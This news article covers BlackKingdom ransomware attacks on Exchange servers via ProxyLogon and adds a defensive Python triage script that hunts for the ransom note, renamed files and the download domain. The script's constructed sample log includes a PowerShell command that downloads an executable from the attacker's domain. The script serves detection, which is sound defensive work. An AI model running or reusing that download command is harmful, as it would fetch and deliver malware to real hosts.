Microsoft Exchange Servers Targeted By BlackKingdom Ransomware

Security researcher Marcus Hutchins, aka MalwareTechBlog, has reported a new ransomware operation known as “BlackKingdom” that exploits the Microsoft Exchange Server ProxyLogon vulnerabilities.

Over the weekend, Marcus Hutchins tweeted that a threat actor was targeting Microsoft Exchange servers by exploiting the ProxyLogon vulnerabilities and deploying ransomware.

After analyzing his honeypot logs, Hutchins determined that the threat actor executed a PowerShell script that downloaded the ransomware executable from the “yuuuuu44[.]com” website. The attacker then distributed the malware to other computers on the network. The ransomware encrypts files, assigns each of them a random extension, and drops a ransom note named decrypt_file.TxT.

Image from BleepingComputer: BlackKingdom ransom note
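As an added triage example (not code from the article, from Hutchins, or from the attacker), the Python script below hunts for the indicators reported above: it walks a directory tree for the decrypt_file.TxT ransom note, checks whether a note carries the Bitcoin address named later in the article, flags files whose extension is not in a baseline of extensions normally present on the host (BlackKingdom assigns random extensions, so an unknown extension is the signal), and filters PowerShell script-block log text for the download domain. The extension baseline, the sample file tree and the log lines are constructed for the demo; the “random extension” heuristic is an assumption, not a description of how the malware picks names.

```python
"""Offline triage helper for the BlackKingdom indicators described in the article.

Added example, not code from the article, the researcher, or the attacker.
The baseline extension set, the sample tree built by build_sample_tree() and
SAMPLE_LOG are constructed for the demo; only the note name, the Bitcoin
address and the download domain come from the article.
"""
import os
import re
import tempfile
from pathlib import Path

NOTE_NAME = "decrypt_file.txt"                     # matched case-insensitively
BTC_ADDRESS = "1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT"  # address reported in the article
DOWNLOAD_DOMAIN = "yuuuuu44.com"                   # defanged in the article as yuuuuu44[.]com

# Hypothetical baseline of extensions expected on the host (assumption).
DEFAULT_BASELINE = {".txt", ".docx", ".xlsx", ".pdf", ".log", ".dll", ".exe", ".ps1"}


def is_random_extension(name, baseline):
    """True when the file's final extension is absent from the baseline and
    looks like an alphanumeric blob of 4+ characters (heuristic, assumption)."""
    ext = Path(name).suffix
    if not ext or ext.lower() in baseline:
        return False
    return re.fullmatch(r"\.[A-Za-z0-9]{4,}", ext) is not None


def scan_tree(root, baseline=DEFAULT_BASELINE):
    """Walk root; return ransom notes, notes with the known BTC address,
    and files whose extension is outside the baseline."""
    findings = {"notes": [], "notes_with_btc": [], "suspect_files": []}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            if fname.lower() == NOTE_NAME:
                findings["notes"].append(path)
                try:
                    text = Path(path).read_text(errors="replace")
                except OSError:
                    continue
                if BTC_ADDRESS in text:
                    findings["notes_with_btc"].append(path)
            elif is_random_extension(fname, baseline):
                findings["suspect_files"].append(path)
    return findings


def flag_download_cradles(log_lines):
    """Return log lines referencing the download domain, in plain or
    defanged ([.]) form, case-insensitively."""
    pattern = re.compile(r"yuuuuu44(\[\.\]|\.)com", re.IGNORECASE)
    return [line for line in log_lines if pattern.search(line)]


def build_sample_tree(root):
    """Constructed sample data: one share with two 'encrypted' files, one clean
    file and the ransom note. Not observed data."""
    share = Path(root) / "Share"
    share.mkdir()
    (share / "budget.xlsx").write_text("clean file")
    (share / "report.docx.kWxQp").write_bytes(os.urandom(32))
    (share / "photo.jpg.HsLd9v").write_bytes(os.urandom(32))
    (share / "decrypt_file.TxT").write_text(
        "Your files are encrypted. Send $10,000 in BTC to " + BTC_ADDRESS
    )
    return share


# Constructed script-block text in the style of Windows PowerShell event 4104;
# not real log records.
SAMPLE_LOG = [
    "4104 ScriptBlockText: Invoke-WebRequest -Uri http://yuuuuu44.com/ -OutFile C:\\Windows\\Temp\\a.exe",
    "4104 ScriptBlockText: Get-MailboxDatabase | Format-List",
]


def demo_scan(baseline=DEFAULT_BASELINE):
    """Build the sample tree in a temp dir and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp, baseline)


def main():
    f = demo_scan()
    print(f"ransom notes: {len(f['notes'])}, with known BTC address: {len(f['notes_with_btc'])}")
    print(f"files with unknown extensions: {len(f['suspect_files'])}")
    for line in flag_download_cradles(SAMPLE_LOG):
        print("download cradle:", line)


if __name__ == "__main__":
    main()
```

On a real host, point scan_tree at the file shares and user profiles and replace DEFAULT_BASELINE with the extensions actually inventoried there; a baseline that is too small produces noise, one that is too large hides the encrypted files.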

Honeypots are systems that threat researchers deploy to lure attackers and record their activity as they interact with them.

According to submissions to the ransomware identification site ID Ransomware, the BlackKingdom campaign has been encrypting victims’ devices since March 18th. Michael Gillespie, the creator of ID Ransomware, says his system has received over 30 submissions from victims in the USA, Canada, Switzerland, Austria, Russia, France, Israel, the United Kingdom, Germany, Italy, Greece, Australia, and Croatia.

The attackers demand $10,000 in bitcoin, payable to a single Bitcoin address (1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT). The address has received only one payment, on March 18th.

BlackKingdom is the second known ransomware exploiting the Microsoft Exchange ProxyLogon vulnerabilities. The first was DearCry, a previously unknown ransomware family used in attacks earlier this month.

Also worth mentioning: last week Acer suffered a REvil ransomware attack that is suspected to have involved the ProxyLogon vulnerabilities as well. The attackers are demanding $50 million from the company, reported as the largest ransom in history. The Taiwanese electronics maker has not confirmed the attack.

Last week, ESET said at least 10 state-backed hacking groups were now trying to exploit the Microsoft Exchange flaws. 

About the author

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.